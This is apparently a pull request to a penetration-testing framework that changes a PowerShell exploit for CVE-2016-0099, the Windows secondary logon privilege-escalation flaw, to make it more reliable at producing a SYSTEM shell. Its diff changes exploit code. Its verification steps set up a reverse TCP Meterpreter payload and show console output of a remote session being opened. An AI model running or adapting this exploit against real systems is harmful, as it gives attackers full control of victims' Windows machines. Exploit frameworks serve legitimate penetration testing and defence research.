### PR TITLE
Update CVE-2016-0099 Powershell For Better Reliability

### DIFF
--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
         # CreateProcessWithLogonW --> lpCurrentDirectory
         $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
 
-	$path1 = $env:windir
-    	$path1 = "$path1\System32\cmd.exe"
+    $path1 = $env:windir
+        $path1 = "$path1\System32\cmd.exe"
         # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
         $CallResult = [Advapi32]::CreateProcessWithLogonW(
             "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
     $TidArray = @()
 
     echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop Get-ThreadHandle and collect thread handles with a valid TID
-    for ($i=0; $i -lt 500; $i++) {
+    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
+    for ($i=0; $i -lt 1; $i++) {
         $hThread = Get-ThreadHandle
         $hThreadID = [Kernel32]::GetThreadId($hThread)
         # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,6 +309,19 @@ Add-Type -TypeDefinition @"
             0x00000002, $cmd, $args1,
             0x00000004, $null, $GetCurrentPath,
             [ref]$StartupInfo, [ref]$ProcessInfo)
+
+    #---
+    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+    #---
+    # Missing this check used to cause the exploit to fail sometimes.
+    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
+    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
+    # reliable now!
+    #---
+    if (!$CallResult) {
+        continue
+    }
+
         $hTokenHandle = [IntPtr]::Zero
         $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
 

--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -155,7 +155,7 @@ Add-Type -TypeDefinition @"
         # CreateProcessWithLogonW --> lpCurrentDirectory
         $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
 
-    $path1 = $env:windir
+        $path1 = $env:windir
         $path1 = "$path1\System32\cmd.exe"
         # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
         $CallResult = [Advapi32]::CreateProcessWithLogonW(


### PR DESCRIPTION
## What This Patch Does

This improves the Powershell script for CVE-2016-0099 to make it more reliable by checking CreateProcessWithLogonW. Submitted by b33f.
## Verification Steps
- [x] Prepare a Windows 7 SP1 box with 2 core CPUs
- [x] Create a Meterpreter executable for the Windows box
- [x] Get a Meterpreter session first
- [x] In the Meterpreter prompt, do `background`
- [x] In the msf prompt, do: `use exploit/windows/local/ms16_032_secondary_logon_handle_privesc`
- [x] Do: `set SESSION [sid]`
- [x] Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] Do: `set LPORT 5555`
- [x] Do: `exploit`
- [x] You should get a session like the following:

```
msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.146.1:5555 
[*] Writing payload file, C:\Users\sinn3r\Desktop\BPtOWSUBw.txt...
[*] Compressing script contents...
[+] Compressed size: 3588
[*] Executing exploit script...
[*] Sending stage (957999 bytes) to 192.168.146.160
[*] Meterpreter session 2 opened (192.168.146.1:5555 -> 192.168.146.160:49160) at 2016-07-27 12:35:25 -0500
```
